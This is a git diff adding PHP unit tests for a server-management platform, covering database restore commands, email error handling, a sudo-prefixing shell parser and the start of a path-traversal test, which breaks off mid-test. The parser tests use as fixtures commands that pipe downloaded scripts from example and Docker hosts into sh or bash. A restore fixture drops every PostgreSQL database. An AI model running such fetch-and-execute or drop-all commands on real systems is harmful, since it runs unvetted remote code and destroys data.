+ // Should not reach here + $component->prerequisiteInstallAttempts++; + } + + // Attempts should remain 0 + expect($component->prerequisiteInstallAttempts)->toBe(0); + expect($validationResult['success'])->toBeTrue(); +}); diff --git a/tests/Unit/Livewire/Database/S3RestoreTest.php b/tests/Unit/Livewire/Database/S3RestoreTest.php new file mode 100644 index 000000000..18837b466 --- /dev/null +++ b/tests/Unit/Livewire/Database/S3RestoreTest.php @@ -0,0 +1,79 @@ +dumpAll = false; + $component->postgresqlRestoreCommand = 'pg_restore -U $POSTGRES_USER -d $POSTGRES_DB'; + + $database = Mockery::mock('App\Models\StandalonePostgresql'); + $database->shouldReceive('getMorphClass')->andReturn('App\Models\StandalonePostgresql'); + $component->resource = $database; + + $result = $component->buildRestoreCommand('/tmp/test.dump'); + + expect($result)->toContain('pg_restore'); + expect($result)->toContain('/tmp/test.dump'); +}); + +test('buildRestoreCommand handles PostgreSQL with dumpAll', function () { + $component = new Import; + $component->dumpAll = true; + // This is the full dump-all command prefix that would be set in the updatedDumpAll method + $component->postgresqlRestoreCommand = 'psql -U $POSTGRES_USER -c "SELECT pg_terminate_backend(pid) FROM pg_stat_activity WHERE datname IS NOT NULL AND pid <> pg_backend_pid()" && psql -U $POSTGRES_USER -t -c "SELECT datname FROM pg_database WHERE NOT datistemplate" | xargs -I {} dropdb -U $POSTGRES_USER --if-exists {} && createdb -U $POSTGRES_USER postgres'; + + $database = Mockery::mock('App\Models\StandalonePostgresql'); + $database->shouldReceive('getMorphClass')->andReturn('App\Models\StandalonePostgresql'); + $component->resource = $database; + + $result = $component->buildRestoreCommand('/tmp/test.dump'); + + expect($result)->toContain('gunzip -cf /tmp/test.dump'); + expect($result)->toContain('psql -U $POSTGRES_USER postgres'); +}); + +test('buildRestoreCommand handles MySQL without dumpAll', function () { + $component = new Import; + $component->dumpAll = false; + $component->mysqlRestoreCommand = 'mysql -u $MYSQL_USER -p$MYSQL_PASSWORD $MYSQL_DATABASE'; + + $database = Mockery::mock('App\Models\StandaloneMysql'); + $database->shouldReceive('getMorphClass')->andReturn('App\Models\StandaloneMysql'); + $component->resource = $database; + + $result = $component->buildRestoreCommand('/tmp/test.dump'); + + expect($result)->toContain('mysql -u $MYSQL_USER'); + expect($result)->toContain('< /tmp/test.dump'); +}); + +test('buildRestoreCommand handles MariaDB without dumpAll', function () { + $component = new Import; + $component->dumpAll = false; + $component->mariadbRestoreCommand = 'mariadb -u $MARIADB_USER -p$MARIADB_PASSWORD $MARIADB_DATABASE'; + + $database = Mockery::mock('App\Models\StandaloneMariadb'); + $database->shouldReceive('getMorphClass')->andReturn('App\Models\StandaloneMariadb'); + $component->resource = $database; + + $result = $component->buildRestoreCommand('/tmp/test.dump'); + + expect($result)->toContain('mariadb -u $MARIADB_USER'); + expect($result)->toContain('< /tmp/test.dump'); +}); + +test('buildRestoreCommand handles MongoDB', function () { + $component = new Import; + $component->dumpAll = false; + $component->mongodbRestoreCommand = 'mongorestore --authenticationDatabase=admin --username $MONGO_INITDB_ROOT_USERNAME --password $MONGO_INITDB_ROOT_PASSWORD --uri mongodb://localhost:27017 --gzip --archive='; + + $database = Mockery::mock('App\Models\StandaloneMongodb'); + $database->shouldReceive('getMorphClass')->andReturn('App\Models\StandaloneMongodb'); + $component->resource = $database; + + $result = $component->buildRestoreCommand('/tmp/test.dump'); + + expect($result)->toContain('mongorestore'); + expect($result)->toContain('/tmp/test.dump'); +}); diff --git a/tests/Unit/Livewire/EnvironmentVariableAutocompleteTest.php b/tests/Unit/Livewire/EnvironmentVariableAutocompleteTest.php new file mode 100644 index 000000000..19da8b43b --- /dev/null +++ b/tests/Unit/Livewire/EnvironmentVariableAutocompleteTest.php @@ -0,0 +1,53 @@ +toBeTrue(); +}); + +it('component has required properties for environment variable autocomplete', function () { + $component = new Add; + + expect($component)->toHaveProperty('key') + ->and($component)->toHaveProperty('value') + ->and($component)->toHaveProperty('is_multiline') + ->and($component)->toHaveProperty('is_literal') + ->and($component)->toHaveProperty('is_runtime') + ->and($component)->toHaveProperty('is_buildtime') + ->and($component)->toHaveProperty('parameters'); +}); + +it('returns empty arrays when currentTeam returns null', function () { + // Mock Auth facade to return null for user + Auth::shouldReceive('user') + ->andReturn(null); + + $component = new Add; + $component->parameters = []; + + $result = $component->availableSharedVariables(); + + expect($result)->toBe([ + 'team' => [], + 'project' => [], + 'environment' => [], + ]); +}); + +it('availableSharedVariables method wraps authorization checks in try-catch blocks', function () { + // Read the source code to verify the authorization pattern + $reflectionMethod = new ReflectionMethod(Add::class, 'availableSharedVariables'); + $source = file_get_contents($reflectionMethod->getFileName()); + + // Verify that the method contains authorization checks + expect($source)->toContain('$this->authorize(\'view\', $team)') + ->and($source)->toContain('$this->authorize(\'view\', $project)') + ->and($source)->toContain('$this->authorize(\'view\', $environment)') + // Verify authorization checks are wrapped in try-catch blocks + ->and($source)->toContain('} catch (\Illuminate\Auth\Access\AuthorizationException $e) {'); +}); diff --git a/tests/Unit/Notifications/Channels/EmailChannelTest.php b/tests/Unit/Notifications/Channels/EmailChannelTest.php new file mode 100644 index 000000000..6600495d3 --- /dev/null +++ b/tests/Unit/Notifications/Channels/EmailChannelTest.php @@ -0,0 +1,186 @@ +team = Mockery::mock(Team::class); + $this->team->id = 1; + + $user1 = new User(['email' => 'test@example.com']); + $user2 = new User(['email' => 'admin@example.com']); + $members = collect([$user1, $user2]); + $this->team->shouldReceive('getAttribute')->with('members')->andReturn($members); + Team::shouldReceive('find')->with(1)->andReturn($this->team); + + // Mock the notifiable (Team) + $this->notifiable = Mockery::mock(SendsEmail::class); + $this->notifiable->shouldReceive('getAttribute')->with('id')->andReturn(1); + + // Mock email settings with Resend enabled + $this->settings = Mockery::mock(EmailNotificationSettings::class); + $this->settings->resend_enabled = true; + $this->settings->smtp_enabled = false; + $this->settings->use_instance_email_settings = false; + $this->settings->smtp_from_name = 'Test Sender'; + $this->settings->smtp_from_address = 'sender@example.com'; + $this->settings->resend_api_key = 'test_api_key'; + $this->settings->smtp_password = 'password'; + + $this->notifiable->shouldReceive('getAttribute')->with('emailNotificationSettings')->andReturn($this->settings); + $this->notifiable->emailNotificationSettings = $this->settings; + $this->notifiable->shouldReceive('getRecipients')->andReturn(['test@example.com']); + + // Mock the notification + $this->notification = Mockery::mock(Notification::class); + $this->notification->shouldReceive('getAttribute')->with('isTransactionalEmail')->andReturn(false); + $this->notification->shouldReceive('getAttribute')->with('emails')->andReturn(null); + + $mailMessage = Mockery::mock(MailMessage::class); + $mailMessage->subject = 'Test Email'; + $mailMessage->shouldReceive('render')->andReturn('Test'); + + $this->notification->shouldReceive('toMail')->andReturn($mailMessage); + + // Mock global functions + $this->app->instance('send_internal_notification', function () {}); +}); + +it('throws user-friendly error for invalid Resend API key (403)', function () { + // Create mock ErrorException for invalid API key + $resendError = Mockery::mock(ErrorException::class); + $resendError->shouldReceive('getErrorCode')->andReturn(403); + $resendError->shouldReceive('getErrorMessage')->andReturn('API key is invalid.'); + $resendError->shouldReceive('getCode')->andReturn(403); + + // Mock Resend client to throw the error + $resendClient = Mockery::mock(); + $emailsService = Mockery::mock(); + $emailsService->shouldReceive('send')->andThrow($resendError); + $resendClient->emails = $emailsService; + + Resend::shouldReceive('client')->andReturn($resendClient); + + $channel = new EmailChannel; + + expect(fn () => $channel->send($this->notifiable, $this->notification)) + ->toThrow( + NonReportableException::class, + 'Invalid Resend API key. Please verify your API key in the Resend dashboard and update it in settings.' + ); +}); + +it('throws user-friendly error for restricted Resend API key (401)', function () { + // Create mock ErrorException for restricted key + $resendError = Mockery::mock(ErrorException::class); + $resendError->shouldReceive('getErrorCode')->andReturn(401); + $resendError->shouldReceive('getErrorMessage')->andReturn('This API key is restricted to only send emails.'); + $resendError->shouldReceive('getCode')->andReturn(401); + + // Mock Resend client to throw the error + $resendClient = Mockery::mock(); + $emailsService = Mockery::mock(); + $emailsService->shouldReceive('send')->andThrow($resendError); + $resendClient->emails = $emailsService; + + Resend::shouldReceive('client')->andReturn($resendClient); + + $channel = new EmailChannel; + + expect(fn () => $channel->send($this->notifiable, $this->notification)) + ->toThrow( + NonReportableException::class, + 'Your Resend API key has restricted permissions. Please use an API key with Full Access permissions.' + ); +}); + +it('throws user-friendly error for rate limiting (429)', function () { + // Create mock ErrorException for rate limit + $resendError = Mockery::mock(ErrorException::class); + $resendError->shouldReceive('getErrorCode')->andReturn(429); + $resendError->shouldReceive('getErrorMessage')->andReturn('Too many requests.'); + $resendError->shouldReceive('getCode')->andReturn(429); + + // Mock Resend client to throw the error + $resendClient = Mockery::mock(); + $emailsService = Mockery::mock(); + $emailsService->shouldReceive('send')->andThrow($resendError); + $resendClient->emails = $emailsService; + + Resend::shouldReceive('client')->andReturn($resendClient); + + $channel = new EmailChannel; + + expect(fn () => $channel->send($this->notifiable, $this->notification)) + ->toThrow(Exception::class, 'Resend rate limit exceeded. Please try again in a few minutes.'); +}); + +it('throws user-friendly error for validation errors (400)', function () { + // Create mock ErrorException for validation error + $resendError = Mockery::mock(ErrorException::class); + $resendError->shouldReceive('getErrorCode')->andReturn(400); + $resendError->shouldReceive('getErrorMessage')->andReturn('Invalid email format.'); + $resendError->shouldReceive('getCode')->andReturn(400); + + // Mock Resend client to throw the error + $resendClient = Mockery::mock(); + $emailsService = Mockery::mock(); + $emailsService->shouldReceive('send')->andThrow($resendError); + $resendClient->emails = $emailsService; + + Resend::shouldReceive('client')->andReturn($resendClient); + + $channel = new EmailChannel; + + expect(fn () => $channel->send($this->notifiable, $this->notification)) + ->toThrow(NonReportableException::class, 'Email validation failed: Invalid email format.'); +}); + +it('throws user-friendly error for network/transport errors', function () { + // Create mock TransporterException + $transportError = Mockery::mock(TransporterException::class); + $transportError->shouldReceive('getMessage')->andReturn('Network error'); + + // Mock Resend client to throw the error + $resendClient = Mockery::mock(); + $emailsService = Mockery::mock(); + $emailsService->shouldReceive('send')->andThrow($transportError); + $resendClient->emails = $emailsService; + + Resend::shouldReceive('client')->andReturn($resendClient); + + $channel = new EmailChannel; + + expect(fn () => $channel->send($this->notifiable, $this->notification)) + ->toThrow(Exception::class, 'Unable to connect to Resend API. Please check your internet connection and try again.'); +}); + +it('throws generic error with message for unknown error codes', function () { + // Create mock ErrorException with unknown code + $resendError = Mockery::mock(ErrorException::class); + $resendError->shouldReceive('getErrorCode')->andReturn(500); + $resendError->shouldReceive('getErrorMessage')->andReturn('Internal server error.'); + $resendError->shouldReceive('getCode')->andReturn(500); + + // Mock Resend client to throw the error + $resendClient = Mockery::mock(); + $emailsService = Mockery::mock(); + $emailsService->shouldReceive('send')->andThrow($resendError); + $resendClient->emails = $emailsService; + + Resend::shouldReceive('client')->andReturn($resendClient); + + $channel = new EmailChannel; + + expect(fn () => $channel->send($this->notifiable, $this->notification)) + ->toThrow(Exception::class, 'Failed to send email via Resend: Internal server error.'); +}); diff --git a/tests/Unit/NotifyOutdatedTraefikServersJobTest.php b/tests/Unit/NotifyOutdatedTraefikServersJobTest.php new file mode 100644 index 000000000..82edfb0d9 --- /dev/null +++ b/tests/Unit/NotifyOutdatedTraefikServersJobTest.php @@ -0,0 +1,56 @@ +tries)->toBe(3); +}); + +it('handles servers with null traefik_outdated_info gracefully', function () { + // Create a mock server with null traefik_outdated_info + $server = \Mockery::mock('App\Models\Server')->makePartial(); + $server->traefik_outdated_info = null; + + // Accessing the property should not throw an error + $result = $server->traefik_outdated_info; + + expect($result)->toBeNull(); +}); + +it('handles servers with traefik_outdated_info data', function () { + $expectedInfo = [ + 'current' => '3.5.0', + 'latest' => '3.6.2', + 'type' => 'minor_upgrade', + 'upgrade_target' => 'v3.6', + 'checked_at' => '2025-11-14T10:00:00Z', + ]; + + $server = \Mockery::mock('App\Models\Server')->makePartial(); + $server->traefik_outdated_info = $expectedInfo; + + // Should return the outdated info + $result = $server->traefik_outdated_info; + + expect($result)->toBe($expectedInfo); +}); + +it('handles servers with patch update info without upgrade_target', function () { + $expectedInfo = [ + 'current' => '3.5.0', + 'latest' => '3.5.2', + 'type' => 'patch_update', + 'checked_at' => '2025-11-14T10:00:00Z', + ]; + + $server = \Mockery::mock('App\Models\Server')->makePartial(); + $server->traefik_outdated_info = $expectedInfo; + + // Should return the outdated info without upgrade_target + $result = $server->traefik_outdated_info; + + expect($result)->toBe($expectedInfo); + expect($result)->not->toHaveKey('upgrade_target'); +}); diff --git a/tests/Unit/ParseCommandsByLineForSudoTest.php b/tests/Unit/ParseCommandsByLineForSudoTest.php new file mode 100644 index 000000000..f294de35f --- /dev/null +++ b/tests/Unit/ParseCommandsByLineForSudoTest.php @@ -0,0 +1,623 @@ +server = Mockery::mock(Server::class)->makePartial(); + $this->server->shouldReceive('getAttribute')->with('user')->andReturn('ubuntu'); + $this->server->shouldReceive('setAttribute')->andReturnSelf(); + $this->server->user = 'ubuntu'; +}); + +afterEach(function () { + Mockery::close(); +}); + +test('wraps complex Docker install command with pipes in bash -c', function () { + $commands = collect([ + 'curl https://releases.rancher.com/install-docker/27.3.sh | sh || curl https://get.docker.com | sh', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe("sudo bash -c 'curl https://releases.rancher.com/install-docker/27.3.sh | sh || curl https://get.docker.com | sh'"); +}); + +test('wraps complex Docker install command with multiple fallbacks', function () { + $commands = collect([ + 'curl --max-time 300 https://releases.rancher.com/install-docker/27.3.sh | sh || curl https://get.docker.com | sh -s -- --version 27.3', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe("sudo bash -c 'curl --max-time 300 https://releases.rancher.com/install-docker/27.3.sh | sh || curl https://get.docker.com | sh -s -- --version 27.3'"); +}); + +test('wraps command with pipe to bash in bash -c', function () { + $commands = collect([ + 'curl https://example.com/script.sh | bash', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe("sudo bash -c 'curl https://example.com/script.sh | bash'"); +}); + +test('wraps complex command with pipes and && operators', function () { + $commands = collect([ + 'curl https://example.com | sh && echo "done"', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe("sudo bash -c 'curl https://example.com | sh && echo \"done\"'"); +}); + +test('escapes single quotes in complex piped commands', function () { + $commands = collect([ + "curl https://example.com | sh -c 'echo \"test\"'", + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe("sudo bash -c 'curl https://example.com | sh -c '\\''echo \"test\"'\\'''"); +}); + +test('handles simple command without pipes or operators', function () { + $commands = collect([ + 'apt-get update', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('sudo apt-get update'); +}); + +test('handles command with double ampersand operator but no pipes', function () { + $commands = collect([ + 'mkdir -p /foo && chown ubuntu /foo', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('sudo mkdir -p /foo && sudo chown ubuntu /foo'); +}); + +test('handles command with double pipe operator but no pipes', function () { + $commands = collect([ + 'command -v docker || echo "not found"', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + // 'command' is exempted from sudo, but echo gets sudo after || + expect($result[0])->toBe('command -v docker || sudo echo "not found"'); +}); + +test('handles command with simple pipe but no operators', function () { + $commands = collect([ + 'cat file | grep pattern', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('sudo cat file | sudo grep pattern'); +}); + +test('handles command with subshell $(...)', function () { + $commands = collect([ + 'echo $(whoami)', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + // 'echo' is exempted from sudo at the start + expect($result[0])->toBe('echo $(sudo whoami)'); +}); + +test('skips sudo for cd commands', function () { + $commands = collect([ + 'cd /var/www', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('cd /var/www'); +}); + +test('skips sudo for echo commands', function () { + $commands = collect([ + 'echo "test"', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('echo "test"'); +}); + +test('skips sudo for command commands', function () { + $commands = collect([ + 'command -v docker', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('command -v docker'); +}); + +test('skips sudo for true commands', function () { + $commands = collect([ + 'true', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('true'); +}); + +test('handles if statements by adding sudo to condition', function () { + $commands = collect([ + 'if command -v docker', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('if sudo command -v docker'); +}); + +test('skips sudo for fi statements', function () { + $commands = collect([ + 'fi', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('fi'); +}); + +test('adds ownership changes for Coolify data paths', function () { + $commands = collect([ + 'mkdir -p /data/coolify/logs', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + // Note: The && operator adds another sudo, creating double sudo for chown/chmod + // This is existing behavior that may need refactoring but isn't part of this bug fix + expect($result[0])->toBe('sudo mkdir -p /data/coolify/logs && sudo sudo chown -R ubuntu:ubuntu /data/coolify/logs && sudo sudo chmod -R o-rwx /data/coolify/logs'); +}); + +test('adds ownership changes for Coolify tmp paths', function () { + $commands = collect([ + 'mkdir -p /tmp/coolify/cache', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + // Note: The && operator adds another sudo, creating double sudo for chown/chmod + // This is existing behavior that may need refactoring but isn't part of this bug fix + expect($result[0])->toBe('sudo mkdir -p /tmp/coolify/cache && sudo sudo chown -R ubuntu:ubuntu /tmp/coolify/cache && sudo sudo chmod -R o-rwx /tmp/coolify/cache'); +}); + +test('does not add ownership changes for system paths', function () { + $commands = collect([ + 'mkdir -p /var/log', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('sudo mkdir -p /var/log'); +}); + +test('handles multiple commands in sequence', function () { + $commands = collect([ + 'apt-get update', + 'apt-get install -y docker', + 'curl https://get.docker.com | sh', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result)->toHaveCount(3); + expect($result[0])->toBe('sudo apt-get update'); + expect($result[1])->toBe('sudo apt-get install -y docker'); + expect($result[2])->toBe("sudo bash -c 'curl https://get.docker.com | sh'"); +}); + +test('handles empty command list', function () { + $commands = collect([]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result)->toBeArray(); + expect($result)->toHaveCount(0); +}); + +test('handles real-world Docker installation command from InstallDocker action', function () { + $version = '27.3'; + $commands = collect([ + "curl --max-time 300 --retry 3 https://releases.rancher.com/install-docker/{$version}.sh | sh || curl --max-time 300 --retry 3 https://get.docker.com | sh -s -- --version {$version}", + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toStartWith("sudo bash -c '"); + expect($result[0])->toEndWith("'"); + expect($result[0])->toContain('curl --max-time 300'); + expect($result[0])->toContain('| sh'); + expect($result[0])->toContain('||'); + expect($result[0])->not->toContain('| sudo sh'); +}); + +test('preserves command structure in wrapped bash -c', function () { + $commands = collect([ + 'curl https://example.com | sh || curl https://backup.com | sh', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + // The command should be wrapped without breaking the pipe and fallback structure + expect($result[0])->toBe("sudo bash -c 'curl https://example.com | sh || curl https://backup.com | sh'"); + + // Verify it doesn't contain broken patterns like "| sudo sh" + expect($result[0])->not->toContain('| sudo sh'); + expect($result[0])->not->toContain('|| sudo curl'); +}); + +test('handles command with mixed operators and subshells', function () { + $commands = collect([ + 'docker ps || echo $(date)', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + // docker commands now correctly get sudo prefix (word boundary fix for 'do' keyword) + // The || operator adds sudo to what follows, and subshell adds sudo inside $() + expect($result[0])->toBe('sudo docker ps || sudo echo $(sudo date)'); +}); + +test('handles whitespace-only commands gracefully', function () { + $commands = collect([ + ' ', + '', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result)->toHaveCount(2); +}); + +test('detects pipe to sh with additional arguments', function () { + $commands = collect([ + 'curl https://example.com | sh -s -- --arg1 --arg2', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe("sudo bash -c 'curl https://example.com | sh -s -- --arg1 --arg2'"); +}); + +test('handles command chains with both && and || operators with pipes', function () { + $commands = collect([ + 'curl https://first.com | sh && echo "success" || curl https://backup.com | sh', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toStartWith("sudo bash -c '"); + expect($result[0])->toEndWith("'"); + expect($result[0])->not->toContain('| sudo'); +}); + +test('skips sudo for bash control structure keywords - for loop', function () { + $commands = collect([ + ' for i in {1..10}; do', + ' echo $i', + ' done', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + // Control structure keywords should not have sudo prefix + expect($result[0])->toBe(' for i in {1..10}; do'); + expect($result[1])->toBe(' echo $i'); + expect($result[2])->toBe(' done'); +}); + +test('skips sudo for bash control structure keywords - while loop', function () { + $commands = collect([ + 'while true; do', + ' echo "running"', + 'done', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('while true; do'); + expect($result[1])->toBe(' echo "running"'); + expect($result[2])->toBe('done'); +}); + +test('skips sudo for bash control structure keywords - case statement', function () { + $commands = collect([ + 'case $1 in', + ' start)', + ' systemctl start service', + ' ;;', + 'esac', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('case $1 in'); + // Note: ' start)' gets sudo because 'start)' doesn't match any excluded keyword + // The sudo is added at the start of the line, before indentation + expect($result[1])->toBe('sudo start)'); + expect($result[2])->toBe('sudo systemctl start service'); + expect($result[3])->toBe('sudo ;;'); + expect($result[4])->toBe('esac'); +}); + +test('skips sudo for bash control structure keywords - if then else', function () { + $commands = collect([ + 'if [ -f /tmp/file ]; then', + ' cat /tmp/file', + 'else', + ' touch /tmp/file', + 'fi', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('if sudo [ -f /tmp/file ]; then'); + // Note: sudo is added at the start of line (before indentation) for non-excluded commands + expect($result[1])->toBe('sudo cat /tmp/file'); + expect($result[2])->toBe('else'); + expect($result[3])->toBe('sudo touch /tmp/file'); + expect($result[4])->toBe('fi'); +}); + +test('skips sudo for bash control structure keywords - elif', function () { + $commands = collect([ + 'if [ $x -eq 1 ]; then', + ' echo "one"', + 'elif [ $x -eq 2 ]; then', + ' echo "two"', + 'else', + ' echo "other"', + 'fi', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('if sudo [ $x -eq 1 ]; then'); + expect($result[1])->toBe(' echo "one"'); + expect($result[2])->toBe('elif [ $x -eq 2 ]; then'); + expect($result[3])->toBe(' echo "two"'); + expect($result[4])->toBe('else'); + expect($result[5])->toBe(' echo "other"'); + expect($result[6])->toBe('fi'); +}); + +test('handles real-world proxy startup with for loop from StartProxy action', function () { + // This is the exact command structure that was causing the bug in issue #7346 + $commands = collect([ + 'if docker ps -a --format "{{.Names}}" | grep -q "^coolify-proxy$"; then', + " echo 'Stopping and removing existing coolify-proxy.'", + ' docker stop coolify-proxy 2>/dev/null || true', + ' docker rm -f coolify-proxy 2>/dev/null || true', + ' # Wait for container to be fully removed', + ' for i in {1..10}; do', + ' if ! docker ps -a --format "{{.Names}}" | grep -q "^coolify-proxy$"; then', + ' break', + ' fi', + ' echo "Waiting for coolify-proxy to be removed... ($i/10)"', + ' sleep 1', + ' done', + " echo 'Successfully stopped and removed existing coolify-proxy.'", + 'fi', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + // Verify the for loop line doesn't have sudo prefix + expect($result[5])->toBe(' for i in {1..10}; do'); + expect($result[5])->not->toContain('sudo for'); + + // Verify the done line doesn't have sudo prefix + expect($result[11])->toBe(' done'); + expect($result[11])->not->toContain('sudo done'); + + // Verify break doesn't have sudo prefix + expect($result[7])->toBe(' break'); + expect($result[7])->not->toContain('sudo break'); + + // Verify comment doesn't have sudo prefix + expect($result[4])->toBe(' # Wait for container to be fully removed'); + expect($result[4])->not->toContain('sudo #'); + + // Verify other control structures remain correct + expect($result[0])->toStartWith('if sudo docker ps'); + expect($result[8])->toBe(' fi'); + expect($result[13])->toBe('fi'); +}); + +test('skips sudo for break and continue keywords', function () { + $commands = collect([ + 'for i in {1..5}; do', + ' if [ $i -eq 3 ]; then', + ' break', + ' fi', + ' if [ $i -eq 2 ]; then', + ' continue', + ' fi', + 'done', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[2])->toBe(' break'); + expect($result[2])->not->toContain('sudo'); + expect($result[5])->toBe(' continue'); + expect($result[5])->not->toContain('sudo'); +}); + +test('skips sudo for comment lines starting with #', function () { + $commands = collect([ + '# This is a comment', + ' # Indented comment', + 'apt-get update', + '# Another comment', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('# This is a comment'); + expect($result[0])->not->toContain('sudo'); + expect($result[1])->toBe(' # Indented comment'); + expect($result[1])->not->toContain('sudo'); + expect($result[2])->toBe('sudo apt-get update'); + expect($result[3])->toBe('# Another comment'); + expect($result[3])->not->toContain('sudo'); +}); + +test('skips sudo for until loop keywords', function () { + $commands = collect([ + 'until [ -f /tmp/ready ]; do', + ' echo "Waiting..."', + ' sleep 1', + 'done', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('until [ -f /tmp/ready ]; do'); + expect($result[0])->not->toContain('sudo until'); + expect($result[1])->toBe(' echo "Waiting..."'); + // Note: sudo is added at the start of line (before indentation) for non-excluded commands + expect($result[2])->toBe('sudo sleep 1'); + expect($result[3])->toBe('done'); +}); + +test('skips sudo for select loop keywords', function () { + $commands = collect([ + 'select opt in "Option1" "Option2"; do', + ' echo $opt', + ' break', + 'done', + ]); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('select opt in "Option1" "Option2"; do'); + expect($result[0])->not->toContain('sudo select'); + expect($result[2])->toBe(' break'); +}); + +// Tests for word boundary matching - ensuring commands are not confused with bash keywords + +test('adds sudo for ifconfig command (not confused with if keyword)', function () { + $commands = collect(['ifconfig eth0']); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('sudo ifconfig eth0'); + expect($result[0])->not->toContain('if sudo'); +}); + +test('adds sudo for ifup command (not confused with if keyword)', function () { + $commands = collect(['ifup eth0']); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('sudo ifup eth0'); +}); + +test('adds sudo for ifdown command (not confused with if keyword)', function () { + $commands = collect(['ifdown eth0']); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('sudo ifdown eth0'); +}); + +test('adds sudo for find command (not confused with fi keyword)', function () { + $commands = collect(['find /var -name "*.log"']); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('sudo find /var -name "*.log"'); +}); + +test('adds sudo for file command (not confused with fi keyword)', function () { + $commands = collect(['file /tmp/test']); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('sudo file /tmp/test'); +}); + +test('adds sudo for finger command (not confused with fi keyword)', function () { + $commands = collect(['finger user']); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('sudo finger user'); +}); + +test('adds sudo for docker command (not confused with do keyword)', function () { + $commands = collect(['docker ps']); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('sudo docker ps'); +}); + +test('adds sudo for fortune command (not confused with for keyword)', function () { + $commands = collect(['fortune']); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('sudo fortune'); +}); + +test('adds sudo for formail command (not confused with for keyword)', function () { + $commands = collect(['formail -s procmail']); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('sudo formail -s procmail'); +}); + +test('if keyword with word boundary gets sudo inserted correctly', function () { + $commands = collect(['if [ -f /tmp/test ]; then']); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('if sudo [ -f /tmp/test ]; then'); +}); + +test('fi keyword with word boundary is not given sudo', function () { + $commands = collect(['fi']); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('fi'); +}); + +test('for keyword with word boundary is not given sudo', function () { + $commands = collect(['for i in 1 2 3; do']); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('for i in 1 2 3; do'); +}); + +test('do keyword with word boundary is not given sudo', function () { + $commands = collect(['do']); + + $result = parseCommandsByLineForSudo($commands, $this->server); + + expect($result[0])->toBe('do'); +}); diff --git a/tests/Unit/PathTraversalSecurityTest.php b/tests/Unit/PathTraversalSecurityTest.php new file mode 100644 index 000000000..60adb44ac --- /dev/null +++ b/tests/Unit/PathTraversalSecurityTest.php @@ -0,0 +1,184 @@ +toBeFalse(); + expect(isSafeTmpPath(''))->toBeFalse(); + expect(isSafeTmpPath(' '))->toBeFalse(); + }); + + it('rejects paths shorter than minimum length', function () { + expect(isSafeTmpPath('/tmp'))->toBeFalse(); + expect(isSafeTmpPath('/tmp/'))->toBeFalse(); + expect(isSafeTmpPath('/tmp/a'))->toBeTrue(); // 6 chars exactly, should pass + }); + + it('accepts valid /tmp/ paths', function () { + expect(isSafeTmpPath('/tmp/file.txt'))->toBeTrue(); + expect(isSafeTmpPath('/tmp/backup.sql'))->toBeTrue(); + expect(isSafeTmpPath('/tmp/subdir/file.txt'))->toBeTrue(); + expect(isSafeTmpPath('/tmp/very/deep/nested/path/file.sql'))->toBeTrue(); + }); + + it('rejects obvious path traversal attempts with ..', function () { + 